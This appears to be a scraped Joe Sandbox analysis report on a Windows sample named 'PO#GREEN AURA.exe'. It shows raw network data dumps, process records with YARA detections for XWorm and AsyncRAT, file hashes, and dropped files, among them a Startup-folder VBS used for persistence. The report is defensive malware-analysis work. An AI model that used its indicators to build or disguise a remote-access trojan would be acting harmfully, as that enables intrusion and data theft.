Mar 6, 2025 07:06:14.195564985 CET	328	IN	Data Raw: 9c 19 20 ed 28 f7 89 84 ec c2 29 ef 19 0e cf e8 17 e1 c0 d3 c6 65 7f cc 53 ca 8e b3 20 b6 c9 e5 05 37 c5 48 e4 58 a3 54 20 c3 31 85 6b 09 70 8b 2f d3 2d 9a 66 42 7c 16 44 32 9c e1 f7 ff f6 bc a0 f7 46 cd 99 a5 76 ad a6 eb 8b 3b 80 de 3d 85 98 69 Data Ascii: ()eS 7HXT 1kp/-fB\|D2Fv;=i{!Ilcptrf{[X+RMW{ *&}A9aGhkR;OinB1AbG_!A?mBW`WwjSX_WvX=++o]=`
Mar 6, 2025 07:06:14.195601940 CET	1236	IN	Data Raw: c1 78 d5 ad 4d 6c ed bc 24 9f 69 2d 01 87 63 8c f6 28 ba 6e 96 3c 4e 93 81 ed 97 3e e7 8c 85 96 88 d0 60 d2 f7 b2 26 be 24 28 dc 2a b1 8f 77 07 09 57 5a 5d fa e6 10 61 f2 6c 7e 9e aa b7 2b 2e d6 83 f3 ba d8 df 59 6d 2b d1 4d fa 0b 7d eb 5b 04 6b Data Ascii: xMl$i-c(n<N>`&$(*wWZ]al~+.Ym+M}[ke(`"HZQ1,w7Zo)}B~[3rhijn8Io~O_l<n=zG)C&v1VR5oH~0=#yJgJ2Fg
Mar 6, 2025 07:06:14.195640087 CET	1236	IN	Data Raw: c4 1a d1 71 b8 ec 1f b5 33 6d 53 4e dc c6 c3 1f a8 6a a4 52 68 43 5d da 7e 51 16 89 92 a2 ab 36 da d3 79 a4 99 92 0d 1a 83 43 df b2 5d 96 01 05 9a 2d c1 78 2d 83 f4 3f db 45 d1 57 61 48 35 1b 12 5f 0b 8d 73 a7 1c a7 41 2e 6b 8e 82 e5 9c 63 52 a0 Data Ascii: q3mSNjRhC]~Q6yC]-x-?EWaH5_sA.kcRquCg9EN1``qT2mki,gKi7'eUw_S(Sl)H5>"WNy5x\|^nfW#"07B9OV~)Fna
Mar 6, 2025 07:06:14.200850964 CET	1236	IN	Data Raw: 9e a2 c7 ac cd d2 09 63 eb ab 63 39 74 b8 f7 96 6c 59 dc ae d7 cd 8c 4b eb c5 79 0d 61 4b d8 e9 25 0e d2 e0 1f a2 e0 6f 63 da 44 0b 4e 78 69 45 bf e6 2a 17 61 00 97 44 39 88 4f a9 fd 82 fa 48 b4 bb 5e e8 b4 50 6f 9e 02 1c a0 78 65 49 25 a2 5f ca Data Ascii: cc9tlYKyaK%ocDNxiEaD9OH^PoxeI%_0fu[3Vi9}ra{N@N91yNoKB<8`"nQYrui`clp=Y&/Q\Pm2v!\Ci0@v8}gF#4 J2[m8:

Target ID:	0
Start time:	01:06:11
Start date:	06/03/2025
Path:	C:\Users\user\Desktop\PO#GREEN AURA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO#GREEN AURA.exe"
Imagebase:	0xfd0000
File size:	105'984 bytes
MD5 hash:	71E0C8F71B15046709D4E250086346A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1842730771.0000000006580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:06:25
Start date:	06/03/2025
Path:	C:\Users\user\Desktop\PO#GREEN AURA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO#GREEN AURA.exe"
Imagebase:	0x540000
File size:	105'984 bytes
MD5 hash:	71E0C8F71B15046709D4E250086346A4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	01:06:29
Start date:	06/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928
Imagebase:	0x130000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO#GREEN AURA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Count.exe

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
PO#GREEN AURA.exe